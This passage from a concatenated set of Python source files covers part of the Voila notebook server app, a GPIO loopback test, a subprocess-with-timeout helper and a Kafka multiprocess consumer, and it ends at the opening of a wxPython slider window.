            _("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
        ),
        'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
    }

    description = Unicode(
        """voila [OPTIONS] NOTEBOOK_FILENAME
        This launches a stand-alone server for read-only notebooks.
        """
    )
    option_description = Unicode(
        """
        notebook_path:
            File name of the Jupyter notebook to display.
        """
    )

    notebook_filename = Unicode()

    port = Integer(
        8866,
        config=True,
        help=_(
            'Port of the Voilà server. Default 8866.'
        )
    )

    autoreload = Bool(
        False,
        config=True,
        help=_(
            'Will autoreload to server and the page when a template, js file or Python code changes'
        )
    )

    root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))

    static_root = Unicode(
        STATIC_ROOT,
        config=True,
        help=_(
            'Directory holding static assets (HTML, JS and CSS files).'
        )
    )

    # Short CLI aliases for commonly-used trait names.
    aliases = {
        'port': 'Voila.port',
        'static': 'Voila.static_root',
        'strip_sources': 'VoilaConfiguration.strip_sources',
        'autoreload': 'Voila.autoreload',
        'template': 'VoilaConfiguration.template',
        'theme': 'VoilaConfiguration.theme',
        'base_url': 'Voila.base_url',
        'server_url': 'Voila.server_url',
        'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
        'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
        'preheat_kernel': 'VoilaConfiguration.preheat_kernel',
        'pool_size': 'VoilaConfiguration.default_pool_size'
    }

    # Configurable classes exposed in --help-all / config files.
    classes = [
        VoilaConfiguration,
        VoilaExecutor,
        VoilaExporter
    ]

    connection_dir_root = Unicode(
        config=True,
        help=_(
            'Location of temporary connection files. Defaults '
            'to system `tempfile.gettempdir()` value.'
        )
    )
    connection_dir = Unicode()

    base_url = Unicode(
        '/',
        config=True,
        help=_(
            'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
        )
    )

    server_url = Unicode(
        None,
        config=True,
        allow_none=True,
        help=_(
            'Path to prefix to Voilà API handlers. Leave unset to default to base_url'
        )
    )

    notebook_path = Unicode(
        None,
        config=True,
        allow_none=True,
        help=_(
            'path to notebook to serve with Voilà'
        )
    )

    template_paths = List(
        [],
        config=True,
        help=_(
            'path to jinja2 templates'
        )
    )

    static_paths = List(
        [STATIC_ROOT],
        config=True,
        help=_(
            'paths to static assets'
        )
    )

    port_retries = Integer(50, config=True,
        help=_("The number of additional ports to try if the specified port is not available.")
    )

    ip = Unicode('localhost', config=True,
        help=_("The IP address the notebook server will listen on."))

    open_browser = Bool(True, config=True,
        help=_("""Whether to open in a browser after starting.
        The specific browser used is platform dependent and
        determined by the python standard library `webbrowser`
        module, unless it is overridden using the --browser
        (NotebookApp.browser) configuration option.
        """))

    browser = Unicode(u'', config=True,
        help="""Specify what command to use to invoke a web
        browser when opening the notebook. If not specified, the
        default browser will be determined by the `webbrowser`
        standard library module, which allows setting of the
        BROWSER environment variable to override it.
        """)

    webbrowser_open_new = Integer(2, config=True,
        help=_("""Specify Where to open the notebook on startup. This is the
        `new` argument passed to the standard library method `webbrowser.open`.
        The behaviour is not guaranteed, but depends on browser support. Valid
        values are:
        - 2 opens a new tab,
        - 1 opens a new window,
        - 0 opens in an existing window.
        See the `webbrowser.open` documentation for details.
        """))

    custom_display_url = Unicode(u'', config=True,
        help=_("""Override URL shown to users.
        Replace actual URL, including protocol, address, port and base URL,
        with the given value when displaying URL to the users. Do not change
        the actual connection URL. If authentication token is enabled, the
        token is added to the custom URL automatically.
        This option is intended to be used when the URL to display to the user
        cannot be determined reliably by the Jupyter notebook server (proxified
        or containerized setups for example)."""))

    @property
    def display_url(self):
        """URL advertised to the user (custom_display_url wins if set)."""
        if self.custom_display_url:
            url = self.custom_display_url
            if not url.endswith('/'):
                url += '/'
        else:
            if self.ip in ('', '0.0.0.0'):
                # Listening on all interfaces: show the hostname instead.
                ip = "%s" % socket.gethostname()
            else:
                ip = self.ip
            url = self._url(ip)
        # TODO: do we want to have the token?
        # if self.token:
        #     # Don't log full token if it came from config
        #     token = self.token if self._token_generated else '...'
        #     url = (url_concat(url, {'token': token})
        #           + '\n or '
        #           + url_concat(self._url('127.0.0.1'), {'token': token}))
        return url

    @property
    def connection_url(self):
        """URL used to actually connect to the running server."""
        ip = self.ip if self.ip else 'localhost'
        return self._url(ip)

    def _url(self, ip):
        """Build the http URL for the given ip from port and base_url."""
        # TODO: https / certfile
        # proto = 'https' if self.certfile else 'http'
        proto = 'http'
        return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)

    config_file_paths = List(
        Unicode(),
        config=True,
        help=_(
            'Paths to search for voila.(py|json)'
        )
    )

    tornado_settings = Dict(
        {},
        config=True,
        help=_(
            'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
        )
    )

    @default('config_file_paths')
    def _config_file_paths_default(self):
        # Current directory first, then the standard Jupyter config path.
        return [os.getcwd()] + jupyter_config_path()

    @default('connection_dir_root')
    def _default_connection_dir(self):
        connection_dir = tempfile.gettempdir()
        self.log.info('Using %s to store connection files' % connection_dir)
        return connection_dir

    @default('log_level')
    def _default_log_level(self):
        return logging.INFO

    # similar to NotebookApp, except no extra path
    @property
    def nbextensions_path(self):
        """The path to look for Javascript notebook extensions"""
        path = jupyter_path('nbextensions')
        # FIXME: remove IPython nbextensions path after a migration period
        try:
            from IPython.paths import get_ipython_dir
        except ImportError:
            pass
        else:
            path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
        return path

    @default('root_dir')
    def _default_root_dir(self):
        # Serve from the notebook's directory when a single notebook is given.
        if self.notebook_path:
            return os.path.dirname(os.path.abspath(self.notebook_path))
        else:
            return getcwd()

    def _init_asyncio_patch(self):
        """set default asyncio policy to be compatible with tornado
        Tornado 6 (at least) is not compatible with the default
        asyncio implementation on Windows
        Pick the older SelectorEventLoopPolicy on Windows
        if the known-incompatible default policy is in use.
        do this as early as possible to make it a low priority and overridable
        ref: https://github.com/tornadoweb/tornado/issues/2608
        FIXME: if/when tornado supports the defaults in asyncio,
        remove and bump tornado requirement for py38
        """
        if sys.platform.startswith("win") and sys.version_info >= (3, 8):
            import asyncio
            try:
                from asyncio import (
                    WindowsProactorEventLoopPolicy,
                    WindowsSelectorEventLoopPolicy,
                )
            except ImportError:
                pass
                # not affected
            else:
                if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
                    # WindowsProactorEventLoopPolicy is not compatible with tornado 6
                    # fallback to the pre-3.8 default of Selector
                    asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())

    def initialize(self, argv=None):
        """Parse command line / config files and resolve the notebook path."""
        self._init_asyncio_patch()
        self.log.debug("Searching path %s for config files", self.config_file_paths)
        # to make config_file_paths settable via cmd line, we first need to parse it
        super(Voila, self).initialize(argv)
        if len(self.extra_args) == 1:
            arg = self.extra_args[0]
            # I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
            if not self.notebook_path:
                if os.path.isdir(arg):
                    self.root_dir = arg
                elif os.path.isfile(arg):
                    self.notebook_path = arg
                else:
                    raise ValueError('argument is neither a file nor a directory: %r' % arg)
        elif len(self.extra_args) != 0:
            raise ValueError('provided more than 1 argument: %r' % self.extra_args)
        # then we load the config
        self.load_config_file('voila', path=self.config_file_paths)
        # common configuration options between the server extension and the application
        self.voila_configuration = VoilaConfiguration(parent=self)
        self.setup_template_dirs()
        signal.signal(signal.SIGTERM, self._handle_signal_stop)

    def setup_template_dirs(self):
        """Resolve template/static paths and merge template conf.json files."""
        if self.voila_configuration.template:
            template_name = self.voila_configuration.template
            self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
            self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
            conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
            for p in conf_paths:
                # see if config file exists
                if os.path.exists(p):
                    # load the template-related config
                    with open(p) as json_file:
                        conf = json.load(json_file)
                    # update the overall config with it, preserving CLI config priority
                    if 'traitlet_configuration' in conf:
                        recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
                        # pass merged config to overall Voilà config
                        self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
        self.log.debug('using template: %s', self.voila_configuration.template)
        self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
        self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
        if self.notebook_path and not os.path.exists(self.notebook_path):
            raise ValueError('Notebook not found: %s' % self.notebook_path)

    def _handle_signal_stop(self, sig, frame):
        # SIGTERM handler: stop the event loop from a signal-safe callback.
        self.log.info('Handle signal %s.' % sig)
        self.ioloop.add_callback_from_signal(self.ioloop.stop)

    def start(self):
        """Build the tornado application, register handlers and listen."""
        self.connection_dir = tempfile.mkdtemp(
            prefix='voila_',
            dir=self.connection_dir_root
        )
        self.log.info('Storing connection files in %s.' % self.connection_dir)
        self.log.info('Serving static files from %s.' % self.static_root)
        self.kernel_spec_manager = KernelSpecManager(
            parent=self
        )
        # we create a config manager that load both the serverconfig and nbconfig (classical notebook)
        read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
        read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
        self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
        self.contents_manager = LargeFileManager(parent=self)
        preheat_kernel: bool = self.voila_configuration.preheat_kernel
        pool_size: int = self.voila_configuration.default_pool_size
        kernel_manager_class = voila_kernel_manager_factory(
            self.voila_configuration.multi_kernel_manager_class,
            preheat_kernel,
            pool_size
        )
        self.kernel_manager = kernel_manager_class(
            parent=self,
            connection_dir=self.connection_dir,
            kernel_spec_manager=self.kernel_spec_manager,
            allowed_message_types=[
                'comm_open',
                'comm_close',
                'comm_msg',
                'comm_info_request',
                'kernel_info_request',
                'shutdown_request'
            ]
        )
        jenv_opt = {"autoescape": True}  # we might want extra options via cmd line like notebook server
        env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
        nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
        env.install_gettext_translations(nbui, newstyle=False)
        # default server_url to base_url
        self.server_url = self.server_url or self.base_url
        self.app = tornado.web.Application(
            base_url=self.base_url,
            server_url=self.server_url or self.base_url,
            kernel_manager=self.kernel_manager,
            kernel_spec_manager=self.kernel_spec_manager,
            allow_remote_access=True,
            autoreload=self.autoreload,
            voila_jinja2_env=env,
            jinja2_env=env,
            static_path='/',
            server_root_dir='/',
            contents_manager=self.contents_manager,
            config_manager=self.config_manager
        )
        self.app.settings.update(self.tornado_settings)
        handlers = []
        # Core kernel and static-asset handlers.
        handlers.extend([
            (url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
            (url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
            (
                url_path_join(self.server_url, r'/voila/templates/(.*)'),
                TemplateStaticFileHandler
            ),
            (
                url_path_join(self.server_url, r'/voila/static/(.*)'),
                MultiStaticFileHandler,
                {
                    'paths': self.static_paths,
                    'default_filename': 'index.html'
                },
            ),
            (
                url_path_join(self.server_url, r'/voila/themes/(.*)'),
                ThemesHandler,
                {
                    'themes_url': '/voila/themes',
                    'path': '',
                    'labextensions_path': jupyter_path('labextensions'),
                    'no_cache_paths': ['/']
                },
            ),
            (url_path_join(self.server_url, r'/voila/api/shutdown/(.*)'), VoilaShutdownKernelHandler)
        ])
        if preheat_kernel:
            handlers.append(
                (
                    url_path_join(self.server_url, r'/voila/query/%s' % _kernel_id_regex),
                    QueryStringSocketHandler
                )
            )
        # Serving notebook extensions
        if self.voila_configuration.enable_nbextensions:
            handlers.append(
                (
                    url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
                    FileFindHandler,
                    {
                        'path': self.nbextensions_path,
                        'no_cache_paths': ['/'],  # don't cache anything in nbextensions
                    },
                )
            )
        handlers.append(
            (
                url_path_join(self.server_url, r'/voila/files/(.*)'),
                WhiteListFileHandler,
                {
                    'whitelist': self.voila_configuration.file_whitelist,
                    'blacklist': self.voila_configuration.file_blacklist,
                    'path': self.root_dir,
                },
            )
        )
        tree_handler_conf = {
            'voila_configuration': self.voila_configuration
        }
        if self.notebook_path:
            # Single-notebook mode: every path renders that notebook.
            handlers.append((
                url_path_join(self.server_url, r'/(.*)'),
                VoilaHandler,
                {
                    'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
                    'template_paths': self.template_paths,
                    'config': self.config,
                    'voila_configuration': self.voila_configuration
                }
            ))
        else:
            self.log.debug('serving directory: %r', self.root_dir)
            handlers.extend([
                (self.server_url, VoilaTreeHandler, tree_handler_conf),
                (url_path_join(self.server_url, r'/voila/tree' + path_regex),
                 VoilaTreeHandler, tree_handler_conf),
                (url_path_join(self.server_url, r'/voila/render/(.*)'),
                 VoilaHandler,
                 {
                     'template_paths': self.template_paths,
                     'config': self.config,
                     'voila_configuration': self.voila_configuration
                 }),
            ])
        self.app.add_handlers('.*$', handlers)
        self.listen()

    def stop(self):
        """Remove connection files and shut down all kernels."""
        shutil.rmtree(self.connection_dir)
        # NOTE(review): passes the coroutine returned by shutdown_all() to
        # run_sync — assumes run_sync accepts an awaitable; confirm against
        # the jupyter_server version in use.
        run_sync(self.kernel_manager.shutdown_all())

    def random_ports(self, port, n):
        """Generate a list of n random ports near the given port.
        The first 5 ports will be sequential, and the remaining n-5 will be
        randomly selected in the range [port-2*n, port+2*n].
        """
        for i in range(min(5, n)):
            yield port + i
        for i in range(n-5):
            yield max(1, port + random.randint(-2*n, 2*n))

    def listen(self):
        """Bind to the first available candidate port and run the IO loop."""
        success = False
        for port in self.random_ports(self.port, self.port_retries+1):
            try:
                self.app.listen(port, self.ip)
                self.port = port
                self.log.info('Voilà is running at:\n%s' % self.display_url)
            except socket.error as e:
                if e.errno == errno.EADDRINUSE:
                    self.log.info(_('The port %i is already in use, trying another port.') % port)
                    continue
                elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
                    self.log.warning(_("Permission to listen on port %i denied") % port)
                    continue
                else:
                    raise
            else:
                self.port = port
                success = True
                break
        if not success:
            self.log.critical(_('ERROR: the Voilà server could not be started because '
                                'no available port could be found.'))
            self.exit(1)
        if self.open_browser:
            self.launch_browser()
        self.ioloop = tornado.ioloop.IOLoop.current()
        try:
            self.ioloop.start()
        except KeyboardInterrupt:
            self.log.info('Stopping...')
        finally:
            self.stop()

    def launch_browser(self):
        """Open the configured web browser on a temporary redirect page."""
        try:
            browser = webbrowser.get(self.browser or None)
        except webbrowser.Error as e:
            self.log.warning(_('No web browser found: %s.') % e)
            browser = None
        if not browser:
            return
        uri = self.base_url
        fd, open_file = tempfile.mkstemp(suffix='.html')
        # Write a temporary file to open in the browser
        with io.open(fd, 'w', encoding='utf-8') as fh:
            # TODO: do we want to have the token?
            # if self.token:
            #     url = url_concat(url, {'token': self.token})
            url = url_path_join(self.connection_url, uri)
            include_assets_functions = create_include_assets_functions(self.voila_configuration.template, url)
            jinja2_env = self.app.settings['jinja2_env']
            template = jinja2_env.get_template('browser-open.html')
            fh.write(template.render(
                open_url=url, base_url=url,
                theme=self.voila_configuration.theme,
                **include_assets_functions
            ))

        def target():
            return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
        threading.Thread(target=target).start()
# Console-script entry point: launches the Voila application singleton.
main = Voila.launch_instance
|
test_gpio.py | #
# Microchip Peripheral I/O
#
# Joshua Henderson <joshua.henderson@microchip.com>
# Copyright (C) 2017 Microchip Technology Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import threading
import time
import unittest
from mpio import GPIO
# Python 2/3 compatibility: unify raw_input() and the queue module name.
if sys.version_info[0] == 3:
    raw_input = input
    import queue
else:
    import Queue as queue

# GPIO pin numbers under test, overridable via environment variables.
pin_input = int(os.environ.get('GPIO_INPUT', "121"))
pin_output = int(os.environ.get('GPIO_OUTPUT', "123"))
class TestGeneral(unittest.TestCase):
    """Hardware tests for the mpio GPIO wrapper (requires real pins)."""

    def test_open_close(self):
        # NOTE(review): opens the *output* pin in input mode — this only
        # checks the constructor's bookkeeping, so presumably intentional;
        # confirm the pin choice.
        gpio = GPIO(pin_output, "in")
        self.assertTrue(gpio.mode == "in")
        self.assertTrue(gpio.pin == pin_output)
        self.assertTrue(gpio.fd > 0)
        gpio.close()

    # this test requires GPIO_INPUT and GPIO_OUTPUT to be tied together
    def test_loopback(self):
        gpio_in = GPIO(pin_input, GPIO.IN)
        gpio_out = GPIO(pin_output, GPIO.OUT)
        self.assertTrue(gpio_in.mode == "in")
        self.assertTrue(gpio_out.mode == "out")
        # Drive the output and read the level back on the tied input pin.
        gpio_out.set(False)
        self.assertTrue(gpio_in.get() == False)
        gpio_out.set(True)
        self.assertTrue(gpio_in.get() == True)
        gpio_out.set(False)
        self.assertTrue(gpio_in.get() == False)
        gpio_in.close()
        gpio_out.close()

    # this test requires GPIO_INPUT and GPIO_OUTPUT to be tied together
    def test_loopback_async(self):
        gpio_in = GPIO(pin_input, "in")
        gpio_out = GPIO(pin_output, "out")

        # Wrapper for running poll() in a thread
        def threaded_poll(gpio, timeout):
            ret = queue.Queue()
            def f():
                ret.put(gpio.poll(timeout))
            thread = threading.Thread(target=f)
            thread.start()
            return ret

        # NOTE(review): all edge-polling assertions below are commented out,
        # so this test currently only constructs the GPIOs and the helper.
        # gpio_in.edge = "falling"
        # poll_ret = threaded_poll(gpio_in, 5)
        # time.sleep(1)
        # gpio_out.set(False)
        # self.assertTrue(poll_ret.get() == True)
        # self.assertTrue(gpio_in.get() == False)
        # poll_ret = threaded_poll(gpio_in, 2)
        # time.sleep(1)
        # gpio_out.set(False)
        # self.assertTrue(poll_ret.get() == False)
        # self.assertTrue(gpio_in.get() == False)
        # gpio_in.edge = "rising"
        # poll_ret = threaded_poll(gpio_in, 5)
        # time.sleep(1)
        # gpio_out.set(True)
        # self.assertTrue(poll_ret.get() == True)
        # self.assertTrue(gpio_in.get() == True)
        # poll_ret = threaded_poll(gpio_in, 2)
        # time.sleep(1)
        # gpio_out.set(True)
        # self.assertTrue(poll_ret.get() == False)
        # self.assertTrue(gpio_in.get() == True)
        # gpio_in.edge = "both"
        # poll_ret = threaded_poll(gpio_in, 5)
        # time.sleep(1)
        # gpio_out.set(False)
        # self.assertTrue(poll_ret.get() == True)
        # self.assertTrue(gpio_in.get() == False)
        # poll_ret = threaded_poll(gpio_in, 5)
        # time.sleep(1)
        # gpio_out.set(True)
        # self.assertTrue(poll_ret.get() == True)
        # self.assertTrue(gpio_in.get() == True)
        # self.assertTrue(gpio_in.poll(1) == False)

    @unittest.skipIf(os.environ.get('NOINTERACTIVE', False), "interactive disabled")
    def test_interactive(self):
        # Manual check: asks the operator to confirm observed pin levels.
        gpio = GPIO(pin_output, "out")
        gpio.set(False)
        self.assertTrue(raw_input("GPIO out is low? y/n ") == "y")
        gpio.set(True)
        self.assertTrue(raw_input("GPIO out is high? y/n ") == "y")
        gpio.set(False)
        self.assertTrue(raw_input("GPIO out is low? y/n ") == "y")
        gpio.close()
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
timed_subprocess.py | # -*- coding: utf-8 -*-
'''
For running command line executables with a timeout
'''
import shlex
import subprocess
import threading
import hubblestack.exceptions
import hubblestack.utils.data
import hubblestack.utils.stringutils
class TimedProc(object):
    '''
    Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs

    Extra keyword arguments consumed here (not passed to Popen):
        bg: run in background (don't wait); forces stdin/stdout/stderr off
        stdin: data fed to the process via communicate()
        with_communicate: capture stdout/stderr via communicate()
        timeout: seconds to wait in run() before killing the process
        stdin_raw_newlines: if True, leave literal '\\n' in stdin untouched
    '''

    def __init__(self, args, **kwargs):
        self.wait = not kwargs.pop('bg', False)
        self.stdin = kwargs.pop('stdin', None)
        self.with_communicate = kwargs.pop('with_communicate', self.wait)
        self.timeout = kwargs.pop('timeout', None)
        self.stdin_raw_newlines = kwargs.pop('stdin_raw_newlines', False)

        # If you're not willing to wait for the process
        # you can't define any stdin, stdout or stderr
        if not self.wait:
            self.stdin = kwargs['stdin'] = None
            self.with_communicate = False
        elif self.stdin is not None:
            if not self.stdin_raw_newlines:
                # Translate a newline submitted as '\n' on the CLI to an actual
                # newline character.
                self.stdin = hubblestack.utils.stringutils.to_bytes(self.stdin.replace('\\n', '\n'))
            kwargs['stdin'] = subprocess.PIPE

        if not self.with_communicate:
            self.stdout = kwargs['stdout'] = None
            self.stderr = kwargs['stderr'] = None

        if self.timeout and not isinstance(self.timeout, (int, float)):
            raise hubblestack.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
        if kwargs.get('shell', False):
            args = hubblestack.utils.data.decode(args, to_str=True)

        try:
            self.process = subprocess.Popen(args, **kwargs)
        except (AttributeError, TypeError):
            if not kwargs.get('shell', False):
                # Popen sometimes chokes on non-string/non-list args; coerce
                # everything to a list of strings and retry.
                if not isinstance(args, (list, tuple)):
                    try:
                        args = shlex.split(args)
                    except AttributeError:
                        args = shlex.split(str(args))
                str_args = []
                for arg in args:
                    if not isinstance(arg, str):
                        str_args.append(str(arg))
                    else:
                        str_args.append(arg)
                args = str_args
            else:
                if not isinstance(args, (list, tuple, str)):
                    # Handle corner case where someone does a 'cmd.run 3'
                    args = str(args)
            # Ensure that environment variables are strings
            for key, val in iter(kwargs.get('env', {}).items()):
                if not isinstance(val, str):
                    kwargs['env'][key] = str(val)
                if not isinstance(key, str):
                    kwargs['env'][str(key)] = kwargs['env'].pop(key)
            args = hubblestack.utils.data.decode(args)
            self.process = subprocess.Popen(args, **kwargs)
        self.command = args

    def run(self):
        '''
        wait for subprocess to terminate and return subprocess' return code.
        If timeout is reached, throw TimedProcTimeoutError
        '''
        def receive():
            # Collect output (or just wait) according to the init options.
            if self.with_communicate:
                self.stdout, self.stderr = self.process.communicate(input=self.stdin)
            elif self.wait:
                self.process.wait()

        if not self.timeout:
            receive()
        else:
            rt = threading.Thread(target=receive)
            rt.start()
            rt.join(self.timeout)
            # FIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
            if rt.is_alive():
                # Subprocess cleanup (best effort)
                self.process.kill()

                def terminate():
                    if rt.is_alive():
                        self.process.terminate()
                threading.Timer(10, terminate).start()
                raise hubblestack.exceptions.TimedProcTimeoutError(
                    '{0} : Timed out after {1} seconds'.format(
                        self.command,
                        str(self.timeout),
                    )
                )
        return self.process.returncode
|
multiprocess.py | from __future__ import absolute_import
import logging
import time
from multiprocessing import Process, Queue as MPQueue, Event, Value
try:
from Queue import Empty
except ImportError: # python 2
from queue import Empty
from .base import (
AUTO_COMMIT_MSG_COUNT, AUTO_COMMIT_INTERVAL,
NO_MESSAGES_WAIT_TIME_SECONDS
)
from .simple import Consumer, SimpleConsumer
log = logging.getLogger("kafka")
def _mp_consume(client, group, topic, chunk, queue, start, exit, pause, size):
    """
    A child process worker which consumes messages based on the
    notifications given by the controller process

    Arguments (shared with the controller process):
        client: KafkaClient, reinitialised here for a private connection
        group/topic: consumer group name and topic to consume
        chunk: the partitions assigned to this worker
        queue: multiprocessing queue consumed messages are pushed onto
        start/exit/pause: events controlling fetch start, shutdown, back-off
        size: shared int - number of messages the controller wants
              (note: the parameter names `queue`/`exit` shadow builtins,
              kept for call-site compatibility)

    NOTE: Ideally, this should have been a method inside the Consumer
    class. However, multiprocessing module has issues in windows. The
    functionality breaks unless this function is kept outside of a class
    """
    # Make the child processes open separate socket connections
    client.reinit()

    # We will start consumers without auto-commit. Auto-commit will be
    # done by the master controller process.
    consumer = SimpleConsumer(client, group, topic,
                              partitions=chunk,
                              auto_commit=False,
                              auto_commit_every_n=None,
                              auto_commit_every_t=None)

    # Ensure that the consumer provides the partition information
    consumer.provide_partition_info()

    while True:
        # Wait till the controller indicates us to start consumption
        start.wait()

        # If we are asked to quit, do so
        if exit.is_set():
            break

        # Consume messages and add them to the queue. If the controller
        # indicates a specific number of messages, follow that advice
        count = 0

        message = consumer.get_message()
        if message:
            queue.put(message)
            count += 1

            # We have reached the required size. The controller might have
            # more than what he needs. Wait for a while.
            # Without this logic, it is possible that we run into a big
            # loop consuming all available messages before the controller
            # can reset the 'start' event
            if count == size.value:
                pause.wait()
        else:
            # In case we did not receive any message, give up the CPU for
            # a while before we try again
            time.sleep(NO_MESSAGES_WAIT_TIME_SECONDS)

    consumer.stop()
class MultiProcessConsumer(Consumer):
    """
    A consumer implementation that consumes partitions for a topic in
    parallel using multiple processes

    client: a connected KafkaClient
    group: a name for this consumer, used for offset storage and must be unique
    topic: the topic to consume
    auto_commit: default True. Whether or not to auto commit the offsets
    auto_commit_every_n: default 100. How many messages to consume
        before a commit
    auto_commit_every_t: default 5000. How much time (in milliseconds) to
        wait before commit
    num_procs: Number of processes to start for consuming messages.
        The available partitions will be divided among these processes
    partitions_per_proc: Number of partitions to be allocated per process
        (overrides num_procs)

    Auto commit details:
    If both auto_commit_every_n and auto_commit_every_t are set, they will
    reset one another when one is triggered. These triggers simply call the
    commit method on this class. A manual call to commit will also reset
    these triggers
    """
    def __init__(self, client, group, topic, auto_commit=True,
                 auto_commit_every_n=AUTO_COMMIT_MSG_COUNT,
                 auto_commit_every_t=AUTO_COMMIT_INTERVAL,
                 num_procs=1, partitions_per_proc=0):
        # Initiate the base consumer class
        super(MultiProcessConsumer, self).__init__(
            client, group, topic,
            partitions=None,
            auto_commit=auto_commit,
            auto_commit_every_n=auto_commit_every_n,
            auto_commit_every_t=auto_commit_every_t)
        # Variables for managing and controlling the data flow from
        # consumer child process to master.  These are shared with the child
        # processes, so all coordination happens through them.
        self.queue = MPQueue(1024)  # Child consumers dump messages into this
        self.start = Event()        # Indicates the consumers to start fetch
        self.exit = Event()         # Requests the consumers to shutdown
        self.pause = Event()        # Requests the consumers to pause fetch
        self.size = Value('i', 0)   # Indicator of number of messages to fetch
        partitions = self.offsets.keys()
        # If unspecified, start one consumer per partition
        # The logic below ensures that
        # * we do not cross the num_procs limit
        # * we have an even distribution of partitions among processes
        if not partitions_per_proc:
            partitions_per_proc = round(len(partitions) * 1.0 / num_procs)
            if partitions_per_proc < num_procs * 0.5:
                partitions_per_proc += 1
        # The final set of chunks: the iter()-replication trick groups the
        # partition list into fixed-size tuples; missing slots become None
        # and are filtered out per chunk below.
        chunker = lambda *x: [] + list(x)
        chunks = map(chunker, *[iter(partitions)] * int(partitions_per_proc))
        self.procs = []
        for chunk in chunks:
            chunk = filter(lambda x: x is not None, chunk)
            # Each child gets its own client copy plus the shared control
            # primitives created above.
            args = (client.copy(),
                    group, topic, list(chunk),
                    self.queue, self.start, self.exit,
                    self.pause, self.size)
            proc = Process(target=_mp_consume, args=args)
            proc.daemon = True
            proc.start()
            self.procs.append(proc)
    def __repr__(self):
        return '<MultiProcessConsumer group=%s, topic=%s, consumers=%d>' % \
            (self.group, self.topic, len(self.procs))
    def stop(self):
        # Set exit and start off all waiting consumers so they can observe
        # the exit flag and terminate cleanly before we join them.
        self.exit.set()
        self.pause.set()
        self.start.set()
        for proc in self.procs:
            proc.join()
            proc.terminate()
        super(MultiProcessConsumer, self).stop()
    def __iter__(self):
        """
        Iterator to consume the messages available on this consumer
        """
        # Trigger the consumer procs to start off.
        # We will iterate till there are no more messages available
        self.size.value = 0
        self.pause.set()
        while True:
            self.start.set()
            try:
                # We will block for a small while so that the consumers get
                # a chance to run and put some messages in the queue
                # TODO: This is a hack and will make the consumer block for
                # at least one second. Need to find a better way of doing this
                partition, message = self.queue.get(block=True, timeout=1)
            except Empty:
                break
            # Count, check and commit messages if necessary
            self.offsets[partition] = message.offset + 1
            self.start.clear()
            self.count_since_commit += 1
            self._auto_commit()
            yield message
        self.start.clear()
    def get_messages(self, count=1, block=True, timeout=10):
        """
        Fetch the specified number of messages

        count: Indicates the maximum number of messages to be fetched
        block: If True, the API will block till some messages are fetched.
        timeout: If block is True, the function will block for the specified
            time (in seconds) until count messages is fetched. If None,
            it will block forever.
        """
        messages = []
        # Give a size hint to the consumers. Each consumer process will fetch
        # a maximum of "count" messages. This will fetch more messages than
        # necessary, but these will not be committed to kafka. Also, the extra
        # messages can be provided in subsequent runs
        self.size.value = count
        self.pause.clear()
        if timeout is not None:
            max_time = time.time() + timeout
        new_offsets = {}
        while count > 0 and (timeout is None or timeout > 0):
            # Trigger consumption only if the queue is empty
            # By doing this, we will ensure that consumers do not
            # go into overdrive and keep consuming thousands of
            # messages when the user might need only a few
            if self.queue.empty():
                self.start.set()
            try:
                partition, message = self.queue.get(block, timeout)
            except Empty:
                break
            messages.append(message)
            new_offsets[partition] = message.offset + 1
            count -= 1
            if timeout is not None:
                # Shrink the remaining timeout so the overall wait is bounded
                timeout = max_time - time.time()
        self.size.value = 0
        self.start.clear()
        self.pause.set()
        # Update and commit offsets if necessary
        self.offsets.update(new_offsets)
        self.count_since_commit += len(messages)
        self._auto_commit()
        return messages
|
skill_slider.py | import time
from threading import Thread
import wx
class SlidersInputFrame(wx.Frame):
    """Window with `dim` vertically stacked sliders.

    Slider positions are read back as fractions of 1 (a slider value of 5
    means 0.05), as the on-screen label explains.
    """
    def __init__(self, dim=3):
        super().__init__(parent=None, title="Sliders", size=(400, dim*100 - 20))
